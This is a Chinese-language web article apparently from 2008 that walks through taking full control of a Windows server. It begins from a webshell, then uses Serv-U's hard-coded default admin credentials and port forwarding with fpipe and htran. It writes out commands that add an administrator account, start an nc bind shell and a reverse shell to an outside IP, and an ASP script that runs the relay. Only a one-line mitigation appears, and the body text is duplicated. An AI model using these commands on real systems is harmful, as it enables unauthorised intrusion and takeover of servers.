Webshell與Serv-u結(jié)合獲系統(tǒng)最高權(quán)限
互聯(lián)網(wǎng) 發(fā)布時(shí)間:2008-10-08 19:37:56 作者:佚名
我要評論

Serv-U默認(rèn)監(jiān)聽127.0.0.1:43958,在本機(jī)才能連接這個(gè)管理端口,Serv-U默認(rèn)管理賬號是localAdministrator,默認(rèn)密碼是"#l@$ak#.lk;0@P",這個(gè)密碼是固定的。在目標(biāo)機(jī)器上運(yùn)行fpipe -v -l 12345 -r 43958 127.0.0.1,然后在你自己的機(jī)器,用"Serv-U administ
Serv-U默認(rèn)監(jiān)聽127.0.0.1:43958,在本機(jī)才能連接這個(gè)管理端口,Serv-U默認(rèn)管理賬號是localAdministrator,默認(rèn)密碼是"#l@$ak#.lk;0@P",這個(gè)密碼是固定的。在目標(biāo)機(jī)器上運(yùn)行fpipe -v -l 12345 -r 43958 127.0.0.1,然后在你自己的機(jī)器,用"Serv-U administrator"新建SERVER。
目標(biāo)IP:12345
User:LocalAdministrator
Pass:"#l@$ak#.lk;0@P"0
那么目標(biāo)機(jī)器的Serv-U就歸你管了。
利用的前提:要有目標(biāo)機(jī)器的普通權(quán)限的SHELL,不需要能終端或物理控制臺登錄,只要有個(gè)shell,能運(yùn)行端口數(shù)據(jù)轉(zhuǎn)發(fā)的程序就可以了
如何得到一個(gè)shell:sql注射得到webshell或者直接利用動(dòng)網(wǎng)7.0 sp2以下的上傳漏洞上傳webshell
具體實(shí)施方法
1.利用得到的webshell上傳轉(zhuǎn)向程序fpipe,然后執(zhí)行fpipe -v -l 12345 -r 43958 127.0.0.1
2 .在你自己的機(jī)器,用"Serv-U administrator"新建SERVER,依次填入
ip:目標(biāo)IP
端口 :12345
User:LocalAdministrator
Pass:"#l@$ak#.lk;0@P"
現(xiàn)在你就可以管理這臺服務(wù)器的Serv-U了,新建一個(gè)賬號,權(quán)限為系統(tǒng)管理員(system dministrator),并在"目錄訪問(Dir access)"選項(xiàng)中給予"執(zhí)行"權(quán)限(execute).
3. ftp連接,然后執(zhí)行
quote site exec net user iisuser password /add
添加一個(gè)用戶名為iisuser密碼為password的用戶,加到管理員組 quote site exec net localgroup administrators iisuser /add,現(xiàn)在就可以連接終端并登錄了。 當(dāng)然也可以進(jìn)行別的操作,例如上傳一個(gè)nc.exe,在目標(biāo)機(jī)器上得到一個(gè)管理員權(quán)限的shell,可以正向連接,也可以反向連接。 正向連接:連上ftp以后執(zhí)行
quote site exec nc.exe -l -p 23 -t -e cmd.exe
這時(shí)目標(biāo)主機(jī)就成了一臺telnet服務(wù)器,你可以telnet上目標(biāo)服務(wù)器的23端口. 反向連接:假設(shè)你的IP是202.96.209.168 1.先在自己的機(jī)器上運(yùn)行(你要有一個(gè)外部IP):nc -vv -lp 99 2.在目標(biāo)機(jī)器上運(yùn)行 nc -e cmd.exe 202.96.209.168 99 在你的機(jī)器上就會得到一個(gè)目標(biāo)機(jī)器的具有管理員權(quán)限的shell 如果對方進(jìn)行了端口過濾或者設(shè)置了防火墻的保護(hù)( 這種保護(hù)不限制反彈連接,如果限制的話就要換別的方法)可以用TCP SOCKET轉(zhuǎn)發(fā)來實(shí)現(xiàn)。 打個(gè)比方: 我的機(jī)器為 A; 我要測試的機(jī)器為 B[不允許正面連接]; 我已經(jīng)在B上得到呢一個(gè)SHELL[只要guest的就行呢]? 我們可以這樣連上對方的43958: I:我在本地監(jiān)聽二個(gè)端口23和56 23是等待B來連接的; 56是等待我來連接的; II:B連接我監(jiān)聽的23,同時(shí)轉(zhuǎn)發(fā)到本地的43958 這樣管道就建好呢~對方的防火墻就拿我們沒有辦法呢? 此時(shí)在本地運(yùn)行Serv-U新建一個(gè)SERVER,IP填上本地的127.0.0.1端口為56用戶localAdministrator,密碼#l@$ak#.lk;0@P。 具體實(shí)施方法 假設(shè)你的IP是 202.96.209.168 1.在你自己的機(jī)器上運(yùn)行 htran.exe -listen 23 56; 2.此時(shí)在本地運(yùn)行Serv-U新建一個(gè)SERVER,IP填上本地的127.0.0.1端口為56,用戶名LocalAdministrator,密碼#l@$ak#.lk;0@P; 3。在目標(biāo)機(jī)器上運(yùn)行 htran.exe -slave 127.0.0.1 43958 202.96.209.168 23 如果不能在webshell下直接運(yùn)行,可以寫一個(gè)asp腳本來執(zhí)行,內(nèi)容如下:
connect.asp
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
oScript.Run (server.mappath("htran")&" -slave 127.0.0.1 43958 202.96.209.168 23 ")
%>
執(zhí)行http://目標(biāo)網(wǎng)址/connect.asp,如果出來一片空白,沒提示什么錯(cuò)誤,現(xiàn)在你應(yīng)該可以管理目標(biāo)服務(wù)器的Serv-U了,余下的事情就看您自由發(fā)揮了。htran.exe是一個(gè)多線程包轉(zhuǎn)發(fā)工具,可以到紅盟下載 防止方法 自己給Serv-U打補(bǔ)丁,改變默認(rèn)端口及管理密碼。修改 ServUAdmin.exe、ServUDaemon.exe這兩個(gè)文件,改端口只要在ServUDaemon.ini文件[GLOBAL]選項(xiàng)中加入LocalSetupPortNo=12345即可 很遺憾,在Serv-U的最新版本Serv-U 5.2.0.0中依然沒有任何改變,默認(rèn)的管理端口及密碼還是原來的。
quote site exec net user iisuser password /add
添加一個(gè)用戶名為iisuser密碼為password的用戶,加到管理員組 quote site exec net localgroup administrators iisuser /add,現(xiàn)在就可以連接終端并登錄了。 當(dāng)然也可以進(jìn)行別的操作,例如上傳一個(gè)nc.exe,在目標(biāo)機(jī)器上得到一個(gè)管理員權(quán)限的shell,可以正向連接,也可以反向連接。 正向連接:連上ftp以后執(zhí)行
quote site exec nc.exe -l -p 23 -t -e cmd.exe
這時(shí)目標(biāo)主機(jī)就成了一臺telnet服務(wù)器,你可以telnet上目標(biāo)服務(wù)器的23端口. 反向連接:假設(shè)你的IP是202.96.209.168 1.先在自己的機(jī)器上運(yùn)行(你要有一個(gè)外部IP):nc -vv -lp 99 2.在目標(biāo)機(jī)器上運(yùn)行 nc -e cmd.exe 202.96.209.168 99 在你的機(jī)器上就會得到一個(gè)目標(biāo)機(jī)器的具有管理員權(quán)限的shell 如果對方進(jìn)行了端口過濾或者設(shè)置了防火墻的保護(hù)( 這種保護(hù)不限制反彈連接,如果限制的話就要換別的方法)可以用TCP SOCKET轉(zhuǎn)發(fā)來實(shí)現(xiàn)。 打個(gè)比方: 我的機(jī)器為 A; 我要測試的機(jī)器為 B[不允許正面連接]; 我已經(jīng)在B上得到呢一個(gè)SHELL[只要guest的就行呢]? 我們可以這樣連上對方的43958: I:我在本地監(jiān)聽二個(gè)端口23和56 23是等待B來連接的; 56是等待我來連接的; II:B連接我監(jiān)聽的23,同時(shí)轉(zhuǎn)發(fā)到本地的43958 這樣管道就建好呢~對方的防火墻就拿我們沒有辦法呢? 此時(shí)在本地運(yùn)行Serv-U新建一個(gè)SERVER,IP填上本地的127.0.0.1端口為56用戶localAdministrator,密碼#l@$ak#.lk;0@P。 具體實(shí)施方法 假設(shè)你的IP是 202.96.209.168 1.在你自己的機(jī)器上運(yùn)行 htran.exe -listen 23 56; 2.此時(shí)在本地運(yùn)行Serv-U新建一個(gè)SERVER,IP填上本地的127.0.0.1端口為56,用戶名LocalAdministrator,密碼#l@$ak#.lk;0@P; 3。在目標(biāo)機(jī)器上運(yùn)行 htran.exe -slave 127.0.0.1 43958 202.96.209.168 23 如果不能在webshell下直接運(yùn)行,可以寫一個(gè)asp腳本來執(zhí)行,內(nèi)容如下:
connect.asp
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
oScript.Run (server.mappath("htran")&" -slave 127.0.0.1 43958 202.96.209.168 23 ")
%>
執(zhí)行http://目標(biāo)網(wǎng)址/connect.asp,如果出來一片空白,沒提示什么錯(cuò)誤,現(xiàn)在你應(yīng)該可以管理目標(biāo)服務(wù)器的Serv-U了,余下的事情就看您自由發(fā)揮了。htran.exe是一個(gè)多線程包轉(zhuǎn)發(fā)工具,可以到紅盟下載 防止方法 自己給Serv-U打補(bǔ)丁,改變默認(rèn)端口及管理密碼。修改 ServUAdmin.exe、ServUDaemon.exe這兩個(gè)文件,改端口只要在ServUDaemon.ini文件[GLOBAL]選項(xiàng)中加入LocalSetupPortNo=12345即可 很遺憾,在Serv-U的最新版本Serv-U 5.2.0.0中依然沒有任何改變,默認(rèn)的管理端口及密碼還是原來的。
相關(guān)文章
什么是CC攻擊 判斷網(wǎng)站是否被CC攻擊并且如何防御CC攻擊
CC主要是用來攻擊頁面的,大家都有這樣的經(jīng)歷,就是在訪問論壇時(shí),如果這個(gè)論壇比較大,訪問的人比較多,打開頁面的速度會比較慢,對不?!一般來說,訪問的人越多,論壇的頁2024-01-06Windows系統(tǒng)安全風(fēng)險(xiǎn)-本地NTLM重放提權(quán)
入侵者主要通過Potato程序攻擊擁有SYSTEM權(quán)限的端口偽造網(wǎng)絡(luò)身份認(rèn)證過程,利用NTLM重放機(jī)制騙取SYSTEM身份令牌,最終取得系統(tǒng)權(quán)限,該安全風(fēng)險(xiǎn)微軟并不認(rèn)為存在漏洞,所以2021-04-15- 這篇文章主要介紹了文件上傳漏洞全面滲透分析小結(jié),這里主要為大家分享一下防御方法,需要的朋友可以參考下2021-03-21
- 這篇文章主要介紹了sql手工注入語句&SQL手工注入大全,需要的朋友可以參考下2017-09-06
- 這篇文章主要介紹了詳解Filezilla server 提權(quán),需要的朋友可以參考下2017-05-13
FileZilla Server 2008 x64 提權(quán)與防御方法
這篇文章主要介紹了FileZilla Server 2008 x64 提權(quán)與防御方法,需要的朋友可以參考下2017-05-13https加密也被破解 HEIST攻擊從加密數(shù)據(jù)獲取明文
不久之前我們說過關(guān)于http和https的區(qū)別,對于加密的https,我們一直認(rèn)為它是相對安全的,可今天要講的是,一種繞過HTTPS加密得到明文信息的web攻擊方式,不知道這消息對你2016-08-10iPhone和Mac也會被黑 一條iMessage密碼可能就被盜了
一直以來蘋果系統(tǒng)的安全性都是比安卓要高的,但是再安全的系統(tǒng)也免不了漏洞,蘋果也一樣。最近爆出的新漏洞,只需要接收一條多媒體信息或者iMessage就會導(dǎo)致用戶信息泄露。2016-07-27- 國家正在修正關(guān)于黑客方面的法律法規(guī),有一條震驚黑客圈的“世紀(jì)佳緣”起訴白帽黑客事件,深深的傷害了廣大黑客們的心,加上扎克伯格和特拉維斯·卡蘭尼克賬號被盜,于是黑2016-07-11
如何逆向破解HawkEye keylogger鍵盤記錄器進(jìn)入攻擊者郵箱
面對惡意郵件攻擊,我們就只能默默忍受被他攻擊,連自我保護(hù)能力都沒有談什么反抗?讓人痛快的是,如今有了解決辦法,逆向破解鍵盤記錄器,進(jìn)入攻擊者郵箱2016-07-06